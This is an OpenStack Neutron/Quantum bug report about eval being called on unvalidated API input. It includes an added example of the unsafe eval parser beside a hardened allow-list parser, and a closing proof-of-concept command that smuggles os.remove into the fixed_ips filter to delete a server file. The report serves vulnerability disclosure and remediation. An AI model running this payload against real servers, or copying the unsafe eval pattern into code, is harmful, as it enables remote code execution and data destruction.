eval used without validating input
Bug #1052179 reported by Mark McClain
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
neutron | Fix Released | Critical | Maru Newby |
Bug Description
The db_base_plugin calls eval without validating the input.
Thanks to Maru Newby for reporting this.
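Added example, not Neutron's own code: the defective pattern the report describes (a client-supplied filter value handed to eval) beside a hardened parser that accepts only allow-listed `key=value` pairs with strictly typed values. The key names and the helper `rejects` are assumptions for this illustration.

```python
import ipaddress
import uuid

# Keys a fixed_ips filter may legitimately carry (assumption for this example).
ALLOWED_KEYS = {"ip_address", "subnet_id"}


def parse_fixed_ips_filter_unsafe(value):
    """The defective pattern: the query-string value is evaluated as Python."""
    return eval(value)  # any expression the client sends runs on the server


def parse_fixed_ips_filter(value):
    """Hardened replacement: accept only 'key=value[,key=value]' with
    allow-listed keys and strictly typed values; anything else is rejected."""
    result = {}
    for pair in value.split(","):
        key, sep, raw = pair.partition("=")
        key, raw = key.strip(), raw.strip()
        if not sep or key not in ALLOWED_KEYS:
            raise ValueError("unsupported fixed_ips filter: %r" % pair)
        if key in result:
            raise ValueError("duplicate key in fixed_ips filter: %s" % key)
        if key == "ip_address":
            # ipaddress raises ValueError for anything that is not an address
            result[key] = str(ipaddress.ip_address(raw))
        else:
            # uuid.UUID raises ValueError for anything that is not a UUID
            result[key] = str(uuid.UUID(raw))
    return result


def rejects(value):
    """True when the hardened parser refuses the value (helper for checks)."""
    try:
        parse_fixed_ips_filter(value)
    except ValueError:
        return True
    return False
```

The hardened parser never interprets the string as code, so a value that is not a well-formed address or UUID fails validation with a ValueError before it reaches the database layer.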
security vulnerability: no → yes
Changed in quantum: assignee: nobody → Maru Newby (maru)
Changed in quantum: status: New → Confirmed
Changed in quantum: milestone: none → folsom-rc2
tags: removed: folsom-rc-potential
Changed in quantum: milestone: folsom-rc2 → 2012.2
The exploit can be triggered via the API. The following exploit will delete a file on the Quantum Server:
quantum port-list -- --fixed_ips "cfg.os. remove( '/tmp/foo' )"